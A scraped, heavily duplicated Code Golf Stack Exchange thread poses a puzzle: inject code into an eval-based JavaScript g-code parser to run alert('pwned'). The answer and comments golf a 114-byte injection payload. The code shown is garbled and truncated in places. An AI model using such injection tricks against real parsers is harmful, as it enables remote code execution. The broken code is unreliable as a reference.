Hack g-code.js parser

Clash Royale CLAN TAG#URR8PPP

up vote
3
down vote

favorite

Here you can see g-code parser, written in JavaScript to use in microcontoller(like espruino). But you can run it in browser, because it don't use any specific features

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;
gcode(prompt("crackme"));

When you pass G1 X3 Y4.53 Z42 to gcode(), it runs G1(X: 3, Y: 4.53, Z: 42). As you can see, it uses eval, protected by regexp. But despite of this, you can attack this function and cause remote code execution. Your goal is to run alert("pwned"). This is code golf, so shortest working input wins

code-golf javascript

share|improve this question

asked 3 hours ago

Евгений Новиков

837116

add a comment | 

up vote
3
down vote

favorite

Here you can see g-code parser, written in JavaScript to use in microcontoller(like espruino). But you can run it in browser, because it don't use any specific features

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;
gcode(prompt("crackme"));

When you pass G1 X3 Y4.53 Z42 to gcode(), it runs G1(X: 3, Y: 4.53, Z: 42). As you can see, it uses eval, protected by regexp. But despite of this, you can attack this function and cause remote code execution. Your goal is to run alert("pwned"). This is code golf, so shortest working input wins

code-golf javascript

share|improve this question

asked 3 hours ago

Евгений Новиков

837116

add a comment | 

up vote
3
down vote

favorite

up vote
3
down vote

favorite

Here you can see g-code parser, written in JavaScript to use in microcontoller(like espruino). But you can run it in browser, because it don't use any specific features

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;
gcode(prompt("crackme"));

When you pass G1 X3 Y4.53 Z42 to gcode(), it runs G1(X: 3, Y: 4.53, Z: 42). As you can see, it uses eval, protected by regexp. But despite of this, you can attack this function and cause remote code execution. Your goal is to run alert("pwned"). This is code golf, so shortest working input wins

code-golf javascript

share|improve this question

asked 3 hours ago

Евгений Новиков

837116

Here you can see g-code parser, written in JavaScript to use in microcontoller(like espruino). But you can run it in browser, because it don't use any specific features

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;
gcode(prompt("crackme"));

When you pass G1 X3 Y4.53 Z42 to gcode(), it runs G1(X: 3, Y: 4.53, Z: 42). As you can see, it uses eval, protected by regexp. But despite of this, you can attack this function and cause remote code execution. Your goal is to run alert("pwned"). This is code golf, so shortest working input wins

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;
gcode(prompt("crackme"));

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;
gcode(prompt("crackme"));

code-golf javascript

code-golf javascript

share|improve this question

asked 3 hours ago

Евгений Новиков

837116

share|improve this question

asked 3 hours ago

Евгений Новиков

837116

share|improve this question

share|improve this question

asked 3 hours ago

Евгений Новиков

837116

asked 3 hours ago

Евгений Новиков

837116

asked 3 hours ago

Евгений Новиков

837116

837116

add a comment | 

add a comment | 

1 Answer
1

active

oldest

votes

up vote
2
down vote

114 bytes

G1 },(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;

payload = `G1 ,(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),`;
gcode(payload);

• Each µ, ß cost 2 bytes.

---

Thanks to l4m2, saves 1 byte.

share,(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;

payload = `G1 ,(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),improve this answer

edited 9 mins ago

answered 3 hours ago

tsh

7,84611346

• 
  
  
  

  
  

  
  
  
  
  
  

  
  Use $=>$ instead?
  – l4m2
  54 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  +'5'[+]?
  – l4m2
  32 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  @l4m2 +'5' will convert to string which is incorrect.
  – tsh
  24 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  I was thinking -~-~-~-~-~$ instead of $-~'4'[+] but it turns out to be the same length.
  – Neil
  13 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  @Neil changed to ++$+'5'[+]*(ß[$]==':') anyway
  – tsh
  8 mins ago
  

  
  
  
  

add a comment ,(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;

payload = `G1 ,(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),improve this answer

edited 9 mins ago

answered 3 hours ago

tsh

7,84611346

• 
  
  
  

  
  

  
  
  
  
  
  

  
  Use $=>$ instead?
  – l4m2
  54 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  +'5'[+]?
  – l4m2
  32 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  @l4m2 +'5' will convert to string which is incorrect.
  – tsh
  24 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  I was thinking -~-~-~-~-~$ instead of $-~'4'[+] but it turns out to be the same length.
  – Neil
  13 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  @Neil changed to ++$+'5'[+]*(ß[$]==':') anyway
  – tsh
  8 mins ago
  

  
  
  
  

add a comment ,(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;

payload = `G1 ,(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),`;
gcode(payload);

• Each µ, ß cost 2 bytes.

---

Thanks to l4m2, saves 1 byte.

share,(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;

payload = `G1 ,(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),`;
gcode(payload);

• Each µ, ß cost 2 bytes.

---

Thanks to l4m2, saves 1 byte.

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;

payload = `G1 ,(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),`;
gcode(payload);

function gcode(str)
 //Removes comment, parses command name and args
 const [,f,args] = (str.match(/^([GM]d+) ([^;]+)/) 
const G1 = console.log;

payload = `G1 ,(µ=(ß,$=+)=>ß[$]?ß[$]+µ(ß,++$+'5'[+]*(ß[$]==':')):'')[µ('constructor')](µ('alert("pwned")'))(),{`;
gcode(payload);

share|improve this answer

edited 9 mins ago

answered 3 hours ago

tsh

7,84611346

share|improve this answer

share|improve this answer

edited 9 mins ago

edited 9 mins ago

edited 9 mins ago

answered 3 hours ago

tsh

7,84611346

answered 3 hours ago

tsh

7,84611346

answered 3 hours ago

tsh

7,84611346

7,84611346

• 
  
  
  

  
  

  
  
  
  
  
  

  
  Use $=>$ instead?
  – l4m2
  54 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  +'5'[+]?
  – l4m2
  32 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  @l4m2 +'5' will convert to string which is incorrect.
  – tsh
  24 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  I was thinking -~-~-~-~-~$ instead of $-~'4'[+] but it turns out to be the same length.
  – Neil
  13 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  @Neil changed to ++$+'5'[+]*(ß[$]==':') anyway
  – tsh
  8 mins ago
  

  
  
  
  

add a comment | 

• 
  
  
  

  
  

  
  
  
  
  
  

  
  Use $=>$ instead?
  – l4m2
  54 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  +'5'[+]?
  – l4m2
  32 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  @l4m2 +'5' will convert to string which is incorrect.
  – tsh
  24 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  I was thinking -~-~-~-~-~$ instead of $-~'4'[+] but it turns out to be the same length.
  – Neil
  13 mins ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  @Neil changed to ++$+'5'[+]*(ß[$]==':') anyway
  – tsh
  8 mins ago
  

  
  
  
  

Use $=>$ instead?
– l4m2
54 mins ago

Use $=>$ instead?
– l4m2
54 mins ago

+'5'[+]?
– l4m2
32 mins ago

+'5'[+]?
– l4m2
32 mins ago

@l4m2 +'5' will convert to string which is incorrect.
– tsh
24 mins ago

@l4m2 +'5' will convert to string which is incorrect.
– tsh
24 mins ago

I was thinking -~-~-~-~-~$ instead of $-~'4'[+] but it turns out to be the same length.
– Neil
13 mins ago

I was thinking -~-~-~-~-~$ instead of $-~'4'[+] but it turns out to be the same length.
– Neil
13 mins ago

@Neil changed to ++$+'5'[+]*(ß[$]==':') anyway
– tsh
8 mins ago

@Neil changed to ++$+'5'[+]*(ß[$]==':') anyway
– tsh
8 mins ago

add a comment | 

 

draft saved

draft discarded

 

draft saved

draft discarded

Sign up or log in

StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);

Sign up using Google

Sign up using Facebook

Sign up using Email and Password

Post as a guest

Name Email

StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fcodegolf.stackexchange.com%2fquestions%2f174873%2fhack-g-code-js-parser%23new-answer', 'question_page');

);

Post as a guest

Name Email

Sign up or log in

StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);

Sign up using Google

Sign up using Facebook

Sign up using Email and Password

Post as a guest

Name Email

Sign up or log in

StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);

Sign up using Google

Sign up using Facebook

Sign up using Email and Password

Post as a guest

Name Email

Sign up or log in

StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);

Sign up using Google

Sign up using Facebook

Sign up using Email and Password

Sign up using Google

Sign up using Facebook

Sign up using Email and Password

Post as a guest

Name Email

Name Email

Name

Email

Name Email

Name

Email